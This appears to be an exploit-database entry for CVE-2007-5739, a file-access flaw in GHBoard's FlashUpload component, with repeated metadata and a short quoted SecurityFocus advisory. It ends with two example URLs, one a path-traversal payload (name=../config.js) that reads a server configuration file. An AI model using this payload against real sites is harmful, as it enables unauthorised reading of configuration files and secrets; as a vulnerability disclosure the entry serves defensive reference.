Korean GHBoard FlashUpload Component - 'download.jsp?name' Arbitrary File Access
| EKU-ID: 35731 | CVE: CVE-2007-5739;OSVDB-38919 | OSVDB-ID: |
| Author: Xcross87 | Published: 2007-10-23 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 35731 | CVE: CVE-2007-5739;OSVDB-38919 | OSVDB-ID: |
| Author: Xcross87 | Published: 2007-10-23 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/26182/info GHBoard is prone to multiple vulnerabilities that let attackers upload and download arbitrary files and execute arbitrary code within the context of the webserver process. http://www.example.com/ghboard/component/flashupload/download.jsp?name=[file_name] http://www.example.com/ghboard/component/flashupload/download.jsp?name=../config.js